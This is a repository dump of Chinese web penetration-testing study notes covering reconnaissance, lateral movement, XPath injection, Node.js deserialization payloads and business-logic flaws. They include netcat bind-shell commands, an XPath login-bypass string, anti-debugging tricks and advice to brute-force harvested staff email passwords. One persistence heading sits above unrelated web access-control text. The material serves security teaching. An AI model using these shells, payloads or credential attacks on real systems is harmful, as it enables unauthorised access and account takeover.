 39 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEe8332f1c8d63646d5ecd2e3804b82643/9632)
 40 | 
 41 | - 突破防火墙的imcp_shell反弹
 42 | - 正向shell
 43 | 
 44 | nc -e /bin/sh -lp 1234
 45 | 
 46 | nc.exe -e cmd.exe -lp 1234
 47 | 
 48 | 5.5.3. 内网文件传输
 49 | - windows下文件传输
 50 | 
 51 | powershell
 52 | 
 53 | vbs脚本文件
 54 | 
 55 | bitsadmin
 56 | 
 57 | 文件共享
 58 | 
 59 | 使用telnet接收数据
 60 | 
 61 | hta
 62 | - linux下文件传输
 63 | 
 64 | python
 65 | 
 66 | wget
 67 | 
 68 | tar + ssh
 69 | 
 70 | 利用dns传输数据
 71 | 
 72 | - 文件编译
 73 | 
 74 | powershell将exe转为txt，再txt转为exe
 75 | 
 76 | 5.5.4. 远程连接 && 执行程序
 77 | 
 78 | ```
 79 | at&schtasks
 80 | psexec
 81 | wmic
 82 | wmiexec.vbs
 83 | smbexec
 84 | powershell remoting
 85 | SC创建服务执行
 86 | schtasks
 87 | SMB+MOF || DLL Hijacks
 88 | PTH + compmgmt.msc
 89 | ```
 90 | 
 91 | 
 92 | ---
 93 | **Windows系统持久化**
 94 | 
 95 | 6.1. 总体思路
 96 | 
 97 | 5.2. 持久化 – Windows
 98 | 
 99 | Web应用需要限制用户对应用程序的数据和功能的访问，以防止用户未经授权访问。访问控制的过程可以分为验证、会话管理和访问控制三个地方。
100 | 
101 | 6.1.1.1. 验证机制
102 | 
103 | 验证机制在一个应用程序的用户访问处理中是一个最基本的部分，验证就是确定该用户的有效性。大多数的web应用都采用使用的验证模型，即用户提交一个用户名和密码，应用检查它的有效性。在银行等安全性很重要的应用程序中，基本的验证模型通常需要增加额外的证书和多级登录过程，比如客户端证书、硬件等。
104 | 
105 | 6.1.1.2. 会话管理
106 | 
107 | 为了实施有效的访问控制，应用程序需要一个方法来识别和处理这一系列来自每个不同用户的请求。大部分程序会为每个会话创建一个唯一性的token来识别。  
108 | 对攻击者来说，会话管理机制高度地依赖于token的安全性。在部分情况下，一个攻击者可以伪装成受害的授权用户来使用Web应用程序。这种情况可能有几种原因，其一是token生成的算法的缺陷，使得攻击者能够猜测到其他用户的token；其二是token后续处理的方法的缺陷，使得攻击者能够获得其他用户的token。
109 | 
110 | 6.1.1.3. 访问控制
111 | 
112 | 处理用户访问的最后一步是正确决定对于每个独立的请求是允许还是拒绝。如果前面的机制都工作正常，那么应用程序就知道每个被接受到的请求所来自的用户的id，并据此决定用户对所请求要执行的动作或要访问的数据是否得到了授权。  
113 | 
114 | 由于访问控制本身的复杂性，这使得它成为攻击者的常用目标。开发者经常对用户会如何与应用程序交互作出有缺陷的假设，也经常省略了对某些应用程序功能的访问控制检查。
115 | 
116 | 6.1.2. 输入处理
117 | 
118 | 很多对Web应用的攻击都涉及到提交未预期的输入，它导致了该应用程序设计者没有料到的行为。因此，对于应用程序安全性防护的一个关键的要求是它必须以一个安全的方式处理用户的输入。  
119 | 
120 | 基于输入的漏洞可能出现在一个应用程序的功能的任何地方，并与其使用的技术类型相关。对于这种攻击，输入验证是 常用的必要防护。不存在通用的单一的防护机制。常用的防护机制有如下几种：
121 | 
122 | 6.1.2.1. 黑名单
123 | 黑名单包含已知的被用在攻击方面的一套字面上的字符串或模式，验证机制阻挡任何匹配黑名单的数据。  
124 | 一般来说,这种方式是被认为是输入效果较差的一种方式。主要有两个原因，其一Web应用中的一个典型的漏洞可以使用很多种不同的输入来被利用，输入可以是被加密的或以各种不同的方法表示。 
125 | 
126 | 其二，漏洞利用的技术是在不断地改进的，有关利用已存在的漏洞类型的新的方法不可能被当前黑名单阻挡。
127 | 
128 | 6.1.2.2. 白名单
129 | 
130 | 白名单包含一系列的字符串、模式或一套标准来匹配符合要求的输入。这种检查机制允许匹配白名单的数据,阻止之外的任何数据。这种方式相对比较有效，但需要比较好的设计。
131 | 
132 | 6.1.2.3. 过滤
133 | 
134 | 过滤会删除潜在的恶意字符并留下安全的字符，基于数据过滤的方式通常是有效的，并且在许多情形中，可作为处理恶意输入的通用解决方案。
135 | 
136 | 6.1.2.4. 安全地处理数据
137 | 
138 | 非常多的web应用程序漏洞的出现是因为用户提供的数据是以不安全的方法被处理的。在一些情况下，存在安全的编程方法能够避免通常的问题。例如，SQL注入攻击能够通过预编译的方式组织，XSS在大部分情况下能够被转义所防御。
139 | 
140 | ---
141 | **安全团队建设**
142 | 
143 | 6.2. 团队建设
144 | 
145 | 6.2.1. 红蓝军简介
146 | 
147 | 在队伍的对抗演习中，蓝军通常是指在部队模拟对抗演习专门扮演假想敌的部队，与红军（代表我方正面部队）进行针对性的训练。  
148 | 
149 | 网络安全红蓝对抗的概念就源自于此。红军作为企业防守方，通过安全加固、攻击监测、应急处置等手段来保障企业安全。而蓝军作为攻击方，以发现安全漏洞，获取业务权限或数据为目标，利用各种攻击手段，试图绕过红军层层防护，达成既定目标。可能会造成混淆的是，在欧美一般采用红队代表攻击方，蓝队代表防守方，颜色代表正好相反。 
150 | 
151 | 企业网络蓝军工作内容主要包括渗透测试和红蓝对抗（Red Teaming），这两种方式所使用的技术基本相同，但是侧重点不同。
152 | 
153 | 渗透测试侧重用较短的时间去挖掘更多的安全漏洞，一般不太关注攻击行为是否被监测发现，目的是帮助业务系统暴露和收敛更多风险。  
154 | 
155 | 红蓝对抗更接近真实场景，侧重绕过防御体系，毫无声息达成获取业务权限或数据的目标，不求发现全部风险点，因为攻击动作越多被发现的概率越大，一旦被发现，红军就会把蓝军踢出战场。红蓝对抗的目的是检验在真实攻击中纵深防御能力、告警运营质量、应急处置能力。
156 | 
157 | 6.2.2. 人员分工
158 | - 部门负责人
159 | 负责组织整体的信息安全规划
160 | 负责向高层沟通申请资源
161 | 负责与组织其他部门的协调沟通
162 | 共同推进信息安全工作
163 | 负责信息安全团队建设
164 | 负责安全事件应急工作处置
165 | 负责推动组织安全规划的落实
166 | - 合规管理员
167 | 负责安全相关管理制度、管理流程的制定，监督实施情况，修改和改进相关的制度和流程
168 | 负责合规性迎检准备工作，包括联络、迎检工作推动，迎检结果汇报等所有相关工作
169 | 负责与外部安全相关单位联络
170 | 负责安全意识培训、宣传和推广
171 | - 安全技术负责人
172 | 业务安全防护整体技术规划和计划
173 | 了解组织安全技术缺陷，并能找到方法进行防御
174 | - 安全设备运维
175 | 服务器与网络基础设备的安全加固推进工作
176 | 安全事件排查与分析，配合定期编写安全分析报告
177 | 关注注业内安全事件， 跟踪最新漏洞信息，进行业务产品的安全检查
178 | 负责漏洞修复工作推进，跟踪解决情况，问题收集
179 | 了解最新安全技术趋势
180 | - 渗透/代码审计人员
181 | 对组织业务网站、业务系统进行安全评估测试
182 | 对漏洞结果提供解决方案和修复建议
183 | - 安全设备运维人员
184 | 负责设备配置和策略的修改
185 | 负责协助其他部门的变更导致的安全策略修改的实现
186 | - 安全开发
187 | 根据组织安全的需要开发安全辅助工具或平台
188 | 参与安全系统的需求分析、设计、编码等开发工作
189 | 维护公司现有的安全程序与系统
190 | 
191 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十四）.md:
--------------------------------------------------------------------------------
 1 | # WEB安全渗透测试基础知识（十四）
 2 | 
 3 | **JavaScript**
 4 | 
 5 | 4.4.1. 原型链
 6 | 
 7 | 4.4.1.1. 显式原型和隐式原型
 8 | 
 9 | JavaScript的原型分为显式原型（explicit prototype property）和隐式原型（implicit prototype link）。  
10 | 其中显式原型指prototype，是函数的一个属性，这个属性是一个指针，指向一个对象，显示修改对象的原型的属性，只有函数才有该属性。  
11 | 
12 | 隐式原型指JavaScript中任意对象都有的内置属性prototype。在ES5之前没有标准的方法访问这个内置属性，但是大多数浏览器都支持通过 __proto__ 来访问。ES5中有了对于这个内置属性标准的Get方法 Object.getPrototypeOf() 。  
13 | 
14 | 隐式原型指向创建这个对象的函数(constructor)的prototype， __proto__
15 | 
16 | 指向的是当前对象的原型对象，而prototype指向的，是以当前函数作为构造函数构造出来的对象的原型对象。  
17 | 显式原型的作用用来实现基于原型的继承与属性的共享。隐式原型的用于构成原型链，同样用于实现基于原型的继承。举个例子，当我们访问obj这个对象中的x属性时，如果在obj中找不到，那么就会沿着 __proto__ 依次查找。  
18 | Note: Object.prototype 这个对象是个例外，它的__proto__值为null
19 | 
20 | 
21 | 4.4.1.2. new 的过程
22 | 
23 | 
24 | ```
25 | var Person = function(){}; 
26 | var p = new Person();
27 | ```
28 | 
29 | new的过程拆分成以下三步：– var p={}; 初始化一个对象p – p.__proto__ = Person.prototype; – Person.call(p); 构造p，也可以称之为初始化p  
30 | 
31 | 关键在于第二步，我们来证明一下：  
32 | 
33 | 
34 | ```
35 | var Person = function(){}; 
36 | var p = new Person(); 
37 | alert(p.__proto__ === Person.prototype);
38 | ```
39 | 
40 | 这段代码会返回true。说明我们步骤2是正确的。
41 | 
42 | 4.4.1.3. 示例
43 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEa8f8cf2b48f4d086cb25afb22da23d96/9478)
44 | 
45 | p是一个引用指向Person的对象。我们在Person的原型上定义了一个sayName方法和age属性，当我们执行p.age时，会先在this的内部查找（也就是构造函数内部），如果没有找到然后再沿着原型链向上追溯。  
46 | 这里的向上追溯是怎么向上的呢？这里就要使用 __proto__ 属性来链接到原型（也就是Person.prototype）进行查找。最终在原型上找到了age属性。
47 | 
48 | ---
49 | 4.4.2. 沙箱逃逸
50 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE170a6e9f86ceb38882e25573e869cc56/9479)
51 | 
52 | 
53 | ---
54 | 4.4.3. 反序列化
55 | 
56 | 4.4.3.1. 简介
57 | 
58 | JavaScript本身并没有反序列化的实现，但是一些库如node-serialize、serialize-to-js等支持了反序列化功能。这些库通常使用JSON形式来存储数据，但是和原生函数JSON.parse、 JSON.stringify不同，这些库支持任何对象的反序列化，特别是函数，如果使用不当，则可能会出现反序列化问题。
59 | 
60 | 4.4.3.2. Payload构造
61 | 
62 | 下面是一个最简单的例子，首先获得序列化后的输出
63 | ![image](https://note.youdao.com/yws/public/resource/d7012273fa21e7de46c1d6e7de7a7619/xmlnote/C8E921BCF13C49DC837D997C6EA1E91C/9500)
64 | 上面执行后会返回
65 | ![image](https://note.youdao.com/yws/public/resource/d7012273fa21e7de46c1d6e7de7a7619/xmlnote/874F863DE5684A93B6EA9926C46D943D/9495)
66 | 
67 | 不过这段payload反序列化后并不会执行，但是在JS中支持立即调用的函数表达式（Immediately Invoked Function Expression），比如 (function () { /* code */ } ()); 这样就会执行函数中的代码。那么可以使用这种方法修改序列化后的字符串来完成一次反序列化。最后的payload测试如下:
68 | 
69 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEcefa6913bedfc715a48044153d92c48d/9522)
70 | 
71 | 4.4.3.3. Payload构造 II
72 | 
73 | 以上提到的是node-serialize这类反序列化库的构造方式，还有一类库如funcster，是使用直接拼接字符串构造函数的方式来执行。
74 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEdde50ba430638be37b2d45d60d379b48/9514)
75 | 
76 | 这种方式可以使用相应的闭合来构造payload。
77 | 
78 | ---
79 | 4.4.4. 其他
80 | 
81 | 4.4.4.1. 命令执行
82 | 
83 | Node.js中child_process.exec命令调用的是/bin/sh，故可以直接使用该命令执行shell
84 | 
85 | 4.4.4.2. 反调试技巧
86 | 
87 | - 函数重定义 console.log = function(a){}
88 | - 定时断点 setInterval(function(){debugger}, 1000);
89 | 
90 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十）
  2 | 
  3 | **3.11. Xpath注入**
  4 | 
  5 | 3.11.1. Xpath定义
  6 | 
  7 | XPath注入攻击是指利用XPath解析器的松散输入和容错特性，能够在 URL、表单或其它信息上附带恶意的XPath 查询代码，以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法，它允许攻击者在事先不知道XPath查询相关知识的情况下，通过XPath查询得到一个XML文档的完整内容。
  8 | 
  9 | 
 10 | ---
 11 | 3.11.2. Xpath注入攻击原理
 12 | 
 13 | XPath注入攻击主要是通过构建特殊的输入，这些输入往往是XPath语法中的一些组合，这些输入将作为参数传入Web 应用程序，通过执行XPath查询而执行入侵者想要的操作，下面以登录验证中的模块为例，说明 XPath注入攻击的实现原理。
 14 | 
 15 | 在Web 应用程序的登录验证程序中，一般有用户名（username）和密码（password） 两个参数，程序会通过用户所提交输入的用户名和密码来执行授权操作。若验证数据存放在XML文件中，其原理是通过查找user表中的用户名 （username）和密码（password）的结果来进行授权访问，  
 16 | 
 17 | 例存在user.xml文件如下：  
 18 | <users>      
 19 |     <user>          
 20 |           <firstname>Ben</firstname>                       
 21 |           <lastname>Elmore</lastname>          
 22 |           <loginID>abc</loginID>          
 23 |           <password>test123</password>      
 24 |     </user>      
 25 |     <user>          
 26 |           <firstname>Shlomy</firstname>          
 27 |           <lastname>Gantz</lastname>          
 28 |           <loginID>xyz</loginID>          
 29 |           <password>123test</password>      
 30 |     </user> 
 31 | 
 32 | 则在XPath中其典型的查询语句如下：
 33 | 
 34 | //users/user[loginID/text()=’xyz’and password/text()=’123test’]  
 35 | 
 36 | 但是，可以采用如下的方法实施注入攻击，绕过身份验证。如果用 户传入一个 login 和 password，例如 loginID = ‘xyz’ 和 password = ‘123test’，则该查询语句将返回 true。但如果用户传入类似 ‘ or 1=1 or ”=’ 的值，那么该查询语句也会得到 true 返回值，因为 XPath 查询语句最终会变成如下代码：
 37 | 
 38 | //users/user[loginID/text()=”or 1=1 or ”=” and password/text()=” or 1=1 or ”=”]  
 39 | 
 40 | 这个字符串会在逻辑上使查询一直返回 true 并将一直允许攻击者访问系统。攻击者可以利用 XPath 在应用程序中动态地操作 XML 文档。攻击完成登录可以再通过XPath盲入技术获取最高权限帐号和其它重要文档信息。
 41 | 
 42 | 
 43 | ---
 44 | 
 45 | **3.12. 逻辑漏洞 / 业务漏洞**
 46 | 
 47 | 3.12.1. 简介
 48 | 
 49 | 逻辑漏洞是指由于程序逻辑不严导致一些逻辑分支处理错误造成的漏洞。  
 50 | 
 51 | 在实际开发中，因为开发者水平不一没有安全意识，而且业务发展迅速内部测试没有及时到位，所以常常会出现类似的漏洞。
 52 | 
 53 | 
 54 | ---
 55 | 3.12.2. 安装逻辑
 56 | 
 57 | - 查看能否绕过判定重新安装
 58 | - 查看能否利用安装文件获取信息
 59 | - 看能否利用更新功能获取信息
 60 | 
 61 | 
 62 | ---
 63 | 3.12.3. 交易
 64 | 
 65 | 3.12.3.1. 购买
 66 | 
 67 | - 修改支付的价格
 68 | - 修改支付的状态
 69 | - 修改购买数量为负数
 70 | - 修改金额为负数
 71 | - 重放成功的请求
 72 | - 并发数据库锁处理不当
 73 | 
 74 | 3.12.3.2. 业务风控
 75 | 
 76 | - 刷优惠券
 77 | - 套现
 78 | 
 79 | 
 80 | ---
 81 | 3.12.4. 账户
 82 | 
 83 | 3.12.4.1. 注册
 84 | 
 85 | - 覆盖注册
 86 | - ’尝试重复用户名
 87 | - 注册遍历猜解已有账号
 88 | 
 89 | 3.12.4.2. 登录
 90 | 
 91 | - 撞库
 92 | - 账号劫持
 93 | - 恶意尝试帐号密码锁死账户
 94 | 
 95 | 3.12.4.3. 找回密码
 96 | 
 97 | - 重置任意用户密码
 98 | - 密码重置后新密码在返回包中
 99 | - Token验证逻辑在前端
100 | 
101 | 3.12.4.4. 修改密码
102 | 
103 | - 越权修改密码
104 | - 修改密码没有旧密码验证
105 | 
106 | 
107 | 
108 | ---
109 | 3.12.5. 验证码
110 | 
111 | - 验证码强度不够
112 | - 验证码无时间限制或者失效时间长
113 | - 验证码无猜测次数限制
114 | - 验证码传递特殊的参数或不传递参数绕过
115 | - 验证码可从返回包中直接获取
116 | - 验证码不刷新或无效
117 | - 验证码数量有限
118 | - 验证码在数据包中返回
119 | - 修改Cookie绕过
120 | - 修改返回包绕过
121 | - 图形验证码可OCR或使用机器学习识别
122 | - 验证码用于手机短信/邮箱轰炸
123 | 
124 | ---
125 | 
126 | 3.12.6. Session
127 | 
128 | - Session机制
129 | - Session猜测 / 爆破
130 | - Session伪造
131 | - Session泄漏
132 | - Session Fixation
133 | 
134 | ---
135 | 
136 | 3.12.7. 越权
137 | 
138 | - 水平越权
139 | 攻击者可以访问与他拥有相同权限的用户的资源
140 | 权限类型不变，ID改变
141 | - 垂直越权
142 | 低级别攻击者可以访问高级别用户的资源
143 | 权限ID不变，类型改变
144 | - 交叉越权
145 | 权限ID改变，类型改变
146 | 
147 | 
148 | ---
149 | 3.12.8. 随机数安全
150 | 
151 | 
152 | - 使用不安全的随机数发生器
153 | - 使用时间等易猜解的因素作为随机数种子
154 | 
155 | 
156 | 3.12.9. 其他
157 | 
158 | - 用户/订单/优惠券等ID生成有规律，可枚举
159 | - 接口无权限、次数限制
160 | - 加密算法实现误用
161 | - 执行顺序
162 | - 敏感信息泄露
163 | 
164 | 
165 | ---
166 | 
167 | **3.13. 配置安全**
168 | 
169 | 3.13. 配置安全
170 | 
171 | - 弱密码
172 | 
173 | 位数过低
174 | 
175 | 字符集小
176 | 
177 | 为常用密码
178 | 
179 | 个人信息相关（手机号 生日 姓名 用户名）
180 | 
181 | 使用键盘模式做密码
182 | 
183 | - 敏感文件泄漏
184 | 
185 | .git
186 | 
187 | .svn
188 | 
189 | - 数据库
190 | - 
191 | Mongo/Redis等数据库无密码且没有限制访问
192 | 
193 | - 加密体系
194 | 
195 | 在客户端存储私钥
196 | 
197 | - 三方库/软件
198 | 
199 | 公开漏洞后没有及时更新
200 | 
201 | 
202 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（四）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（四）
  2 | 
  3 | **2.2. 站点信息**
  4 | 
  5 | - 判断网站操作系统
  6 | Linux大小写敏感
  7 | Windows大小写不敏感
  8 | 
  9 | - 描敏感文件
 10 | robots.txt
 11 | crossdomain.xml
 12 | sitemap.xml
 13 | xx.tar.gz
 14 | xx.bak
 15 | 等
 16 | 
 17 | - 确定网站采用的语言
 18 | 如PHP / Java / Python等
 19 | 找后缀，比如php/asp/jsp
 20 | 
 21 | - 前端框架
 22 | 如jQuery / BootStrap / Vue / React / Angular等
 23 | 查看源代码
 24 | 
 25 | - 中间服务器
 26 | 如 Apache / Nginx / IIS 等
 27 | 查看header中的信息
 28 | 根据报错信息判断
 29 | 根据默认页面判断
 30 | 
 31 | - Web容器服务器
 32 | 如Tomcat / Jboss / Weblogic等
 33 | 
 34 | - 后端框架
 35 | 根据Cookie判断
 36 | 根据CSS / 图片等资源的hash值判断
 37 | 根据URL路由判断（如wp-admin） 
 38 | 根据网页中的关键字判断
 39 | 根据响应头中的X-Powered-By
 40 | 
 41 | - CDN信息
 42 | 常见的有Cloudflare、yunjiasu
 43 | 
 44 | - 探测有没有WAF，如果有，什么类型的
 45 | 有WAF，找绕过方式
 46 | 没有，进入下一步
 47 | 
 48 | - 扫描敏感目录，看是否存在信息泄漏
 49 | 扫描之前先自己尝试几个的url，人为看看反应
 50 | 
 51 | - 使用爬虫爬取网站信息
 52 | - 拿到一定信息后，通过拿到的目录名称，文件名称及文件扩展名了解网站开发人员的命名思路，确定其命名规则，推测出更多的目录及文件名
 53 | 
 54 | 
 55 | **2.3. 端口信息**
 56 | 
 57 | 2.3.1. 常见端口及其脆弱点
 58 | 
 59 | - FTP 21 
 60 | 默认用户名密码 anonymous:anonymous
 61 | 暴力破解密码
 62 | VSFTP某版本后门
 63 | 
 64 | - SSH 22
 65 | 暴力破解密码
 66 | 
 67 | - Telent 23
 68 | 暴力破解密码
 69 | 
 70 | - SMTP 25
 71 | 无认证时可伪造发件人
 72 | 
 73 | - DNS 53 UDP
 74 | 测试域传送漏洞
 75 | SPF / DMARC Check
 76 | DDoS（DNS Query Flood / DNS 反弹）
 77 | 
 78 | - SMB 137/139/445
 79 | 未授权访问
 80 | 弱口令
 81 | 
 82 | - SNMP 161
 83 | Public 弱口令
 84 | 
 85 | - LDAP 389
 86 | 匿名访问
 87 | 注入
 88 | 
 89 | - Rsync 873
 90 | 任意文件读写
 91 | 
 92 | - RPC 1025
 93 | NFS匿名访问
 94 | 
 95 | - MSSQL 1433
 96 | 弱密码
 97 | 
 98 | - Java RMI 1099
 99 | RCE
100 | 
101 | - Oracle 1521
102 | 弱密码
103 | 
104 | - NFS 2049
105 | 权限设置不当
106 | 
107 | - ZooKeeper 2181
108 | 无身份认证
109 | 
110 | - MySQL 3306
111 | 弱密码
112 | 
113 | - RDP 3389
114 | 弱密码
115 | 
116 | - Postgres 5432
117 | 弱密码
118 | 
119 | - CouchDB 5984
120 | 未授权访问
121 | 
122 | - Redis 6379
123 | 无密码或弱密码
124 | 
125 | - Elasticsearch 9200
126 | 代码执行
127 | 
128 | - Memcached 11211
129 | 未授权访问
130 | 
131 | - MongoDB 27017
132 | 无密码或弱密码
133 | 
134 | - Hadoop 50070
135 | 除了以上列出的可能出现的问题，暴露在公网上的服务若不是最新版，都可能存在已经公开的漏洞
136 | 
137 | ------------
138 | 
139 | 2.3.2. 常见端口扫描方式
140 | 2.3.2.1. 全扫描
141 | 扫描主机尝试使用三次握手与目标主机的某个端口建立正规的连接，若成功建立连接，则端口处于开放状态，反之处于关闭状态。  全扫描实现简单，且以较低的权限就可以进行该操作。但是在流量日志中会有大量明显的记录。
142 | 
143 | 2.3.2.2. 半扫描
144 | 在半扫描中，仅发送SYN数据段，如果应答为RST，则端口处于关闭状态，若应答为SYN/ACK，则端口处于监听状态。不过这种方式需要较高的权限，而且部分防火墙已经开始对这种扫描方式做处理。
145 | 
146 | 2.3.2.3. FIN扫描
147 | FIN扫描是向目标发送一个FIN数据包，如果是开放的端口，会返回RST数据包，关闭的端口则不会返回数据包，可以通过这种方式来判断端口是否打开。  这种方式并不在TCP三次握手的状态中，所以不会被记录，相对SYN扫描要更隐蔽一些。
148 | 
149 | ------------
150 | 
151 | 2.3.3. Web服务
152 | Jenkins
153 | 未授权访问
154 | Gitlab
155 | 对应版本CVE
156 | Zabbix
157 | 权限设置不当
158 | 
159 | ------------
160 | 
161 | 2.3.4. 批量搜索
162 | Censys
163 | Shodan
164 | ZoomEye
165 | 
166 | 
167 | ------------
168 | 
169 | 
170 | **搜索信息收集**
171 | 
172 | 2.4.1. 搜索引擎利用
173 | 恰当地使用搜索引擎（Google/Bing/Yahoo/Baidu等）可以获取目标站点的较多信息。  
174 | 
175 | 常见的搜索技巧有：
176 | - site:www.agesec.com
177 | 返回此目标站点被搜索引擎抓取收录的所有内容
178 | 
179 | - site:www.agesec.com keyword
180 | 返回此目标站点被搜索引擎抓取收录的包含此关键词的所有页面
181 | 此处可以将关键词设定为网站后台，管理后台，密码修改，密码找回等
182 | 
183 | - site:www.ageec.com inurl:admin.php
184 | 返回目标站点的地址中包含admin.php的所有页面，可以使用admin.php/manage.php或者其他关键词来寻找关键功能页面
185 | 
186 | - link:www.agesec.com
187 | 返回所有包含目标站点链接的页面，其中包括其开发人员的个人博客，开发日志，或者开放这个站点的第三方公司，合作伙伴等
188 | 
189 | - related:www.agesec.com
190 | 返回所有与目标站点”相似”的页面，可能会包含一些通用程序的信息等
191 | 
192 | - intitle:”500 Internal Server Error” “server at”
193 | 搜索出错的页面
194 | 
195 | - inurl:”nph-proxy.cgi” “Start browsing”
196 | 查找代理服务器
197 | 
198 | 除了以上的关键字，还有allintile、allinurl、allintext、inanchor、cache等。
199 | 
200 | 还有一些其他的tips 
201 | - 查询不区分大小写
202 | - 星号代表某一个单词
203 | - 默认用and
204 | - OR 或者 | 代表逻辑或
205 | - 单词前跟+表强制查询
206 | - 引号引起来可以防止常见词被忽略
207 | - 括号会被忽略
208 | 
209 | 搜索引擎的快照中也常包含一些关键信息，如程序报错信息可以会泄漏网站具体路径，或者一些快照中会保存一些测试用的测试信息，比如说某个网站在开发了后台功能模块的时候，还没给所有页面增加权限鉴别，此时被搜索引擎抓取了快照，即使后来网站增加了权限鉴别，但搜索引擎的快照中仍会保留这些信息。  
210 | 
211 | 另外也有专门的站点快照提供快照功能，如 Wayback Machine 和 Archive.org 等。
212 | 
213 | ------------
214 | 
215 | **2.5. 目标人员信息收集**
216 | 2.5 目标人员信息收集
217 | 针对人员的信息收集考虑对目标重要人员、组织架构、社会关系的收集和分析。其中重要人员主要指高管、系统管理员、运维、财务、人事、业务人员的个人电脑。  
218 | 最容易的入口点是网站，网站中可能包含网站的开发、管理维护等人员的信息。从网站联系功能中和代码的注释信息中都可能得到的所有开发及维护人员的姓名和邮件地址及其他联系方式。  
219 | 在获取这些信息后，可以在Github/Linkedin等网站中进一步查找这些人在互联网上发布的与目标站点有关的一切信息，分析并发现有用的信息。  
220 | 此外，可以对获取到的邮箱进行密码爆破的操作，获取对应的密码。
221 | 


--------------------------------------------------------------------------------
/burp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hack-umbrella/CIS/1c9cb5df0ed9d21e1fb9b5c7488e2203414b6fd8/burp.png


--------------------------------------------------------------------------------
/linux CIS .xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hack-umbrella/CIS/1c9cb5df0ed9d21e1fb9b5c7488e2203414b6fd8/linux CIS .xmind


--------------------------------------------------------------------------------
/信息收集.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hack-umbrella/CIS/1c9cb5df0ed9d21e1fb9b5c7488e2203414b6fd8/信息收集.xmind


--------------------------------------------------------------------------------
/数据库基线加固.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hack-umbrella/CIS/1c9cb5df0ed9d21e1fb9b5c7488e2203414b6fd8/数据库基线加固.xmind


--------------------------------------------------------------------------------